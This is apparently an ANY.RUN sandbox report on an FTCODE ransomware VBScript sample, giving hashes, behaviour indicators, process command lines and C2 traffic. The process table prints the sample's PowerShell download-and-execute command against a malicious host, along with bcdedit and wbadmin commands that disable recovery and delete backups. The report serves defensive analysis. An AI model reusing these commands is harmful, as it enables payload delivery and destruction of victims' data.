analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs

Full analysis: https://app.any.run/tasks/9aac9974-ac45-4cf2-bef5-2dd100b77c8e
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 14:18:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
ransomware
ftcode
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

BE611918FABC12048AEBA6E55F6559D7

SHA1:

4CB525212460FEDAE4820A7CFC39E47DB48C4C7B

SHA256:

07C226D6E4AB84A586B1A09F09896223412DE927513FDA6BF13B031DC497E686

SSDEEP:

48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 2644)
      • cmd.exe (PID: 792)

    • FTCODE was detected

      • powershell.exe (PID: 2064)

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 2064)

    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 1580)

    • Writes to a start menu file

      • powershell.exe (PID: 2064)

    • Renames files like Ransomware

      • powershell.exe (PID: 2064)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 876)

  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • WScript.exe (PID: 2104)
      • vlc.exe (PID: 2096)
      • powershell.exe (PID: 2064)
      • WinRAR.exe (PID: 2940)

    • Creates files in the user directory

      • powershell.exe (PID: 2064)
      • vlc.exe (PID: 2096)

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 2064)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2064)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2104)

  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2064)
      • IEXPLORE.EXE (PID: 2484)
      • iexplore.exe (PID: 2172)

    • Manual execution by user

      • WinRAR.exe (PID: 2940)
      • iexplore.exe (PID: 2172)
      • NOTEPAD.EXE (PID: 2996)

    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 2064)

    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 2064)

    • Changes internet zones settings

      • iexplore.exe (PID: 2172)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2172)

    • Creates files in the user directory

      • iexplore.exe (PID: 2172)
      • IEXPLORE.EXE (PID: 2484)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2484)

    • Dropped object may contain Bitcoin addresses

      • IEXPLORE.EXE (PID: 2484)

    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 2172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
70
Monitored processes
20
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs #STOP powershell.exe vlc.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs winrar.exe no specs iexplore.exe iexplore.exe notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2104"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2064"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2096"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"C:\Program Files\VideoLAN\VLC\vlc.exe
powershell.exe
User:
admin
Company:
VideoLAN
Integrity Level:
MEDIUM
Description:
VLC media player
Version:
2.2.6
876"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 11 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
320"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1580"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh recoveryenabled no C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2644"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967294
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2832bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2788"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1968bcdedit /set cdxxcsh recoveryenabled no C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 823
Read events
2 575
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
40
Text files
151
Unknown types
1

Dropped files

PID
Process
Filename
Type
2064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7E2VZ1MH1J1F9ZZV5WIG.temp
MD5:
SHA256:
2064powershell.exeC:\Users\admin\AppData\Local\Temp\ramst007.mp3
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCB763.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD4F.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD50.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD51.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD52.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD53.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD54.tmp
MD5:
SHA256:
2096vlc.exeC:\Users\admin\AppData\Local\Temp\VLCBD55.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
57
DNS requests
52
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2484
IEXPLORE.EXE
GET
302
74.125.34.46:80
http://www.virustotal.com/
US
whitelisted
2064
powershell.exe
GET
200
31.214.157.155:80
http://ceco.myheritageins.com/?need=aegzfej&vid=vbs4&
NL
text
72.8 Kb
malicious
2064
powershell.exe
GET
200
31.214.157.155:80
http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643
NL
text
9.32 Kb
malicious
2064
powershell.exe
POST
200
185.158.248.151:80
http://ceco.jasonrsheldon.com/
RO
text
2 b
malicious
2064
powershell.exe
POST
200
185.158.248.151:80
http://ceco.jasonrsheldon.com/
RO
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2064
powershell.exe
31.214.157.155:80
ceco.myheritageins.com
easystores GmbH
NL
malicious
2172
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2064
powershell.exe
207.241.224.2:443
archive.org
Internet Archive
US
malicious
2484
IEXPLORE.EXE
40.90.23.154:443
login.live.com
Microsoft Corporation
US
unknown
2064
powershell.exe
185.158.248.151:80
ceco.jasonrsheldon.com
M247 Ltd
RO
malicious
2064
powershell.exe
207.241.228.42:443
ia802302.us.archive.org
Internet Archive
US
unknown
2484
IEXPLORE.EXE
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2484
IEXPLORE.EXE
13.107.5.80:443
api.bing.com
Microsoft Corporation
US
whitelisted
2484
IEXPLORE.EXE
40.126.1.166:443
login.microsoftonline.com
Microsoft Corporation
US
malicious
2484
IEXPLORE.EXE
74.125.34.46:80
www.virustotal.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
archive.org
  • 207.241.224.2
whitelisted
ia802302.us.archive.org
  • 207.241.228.42
unknown
ceco.myheritageins.com
  • 31.214.157.155
malicious
ceco.jasonrsheldon.com
  • 185.158.248.151
unknown
www.bing.com
  • 204.79.197.200
whitelisted
api.bing.com
  • 13.107.5.80
whitelisted
login.microsoftonline.com
  • 40.126.1.166
whitelisted
login.live.com
  • 40.90.23.154
whitelisted
www2.bing.com
  • 204.79.197.200
whitelisted
www.virustotal.com
  • 74.125.34.46
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
Process
Message
vlc.exe
core libvlc: one instance mode ENABLED
vlc.exe
core libvlc: Esecuzione di vlc con l'interfaccia predefinita. Usa 'cvlc' per utilizzare vlc senza interfaccia.
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs